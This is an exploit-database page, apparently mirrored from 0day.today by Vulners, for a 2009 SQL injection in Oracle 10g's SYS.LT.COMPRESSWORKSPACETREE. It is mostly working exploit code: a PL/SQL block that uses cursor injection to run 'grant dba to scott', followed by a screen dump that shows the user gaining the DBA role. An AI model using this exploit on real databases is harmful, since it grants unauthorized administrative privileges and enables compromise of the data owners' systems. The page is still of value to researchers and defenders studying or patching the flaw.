Lucene search

Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

🗓️ 02 Jul 2009 00:00:00Reported by Sumit SiddharthType

zdt🔗 0day.today👁 10 Views

Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit based on cursor injection without create function privileges

=============================================================
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
=============================================================


This is based on cursor injection and does not need create function privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#-----------screen dump---------------------------------------------------#
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme
diate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9
 10
 11  /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO


Sid
www.notsosecure.com



#  0day.today [2018-01-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

02 Jul 2009 00:00Current

6.9Medium risk

Vulners AI Score6.9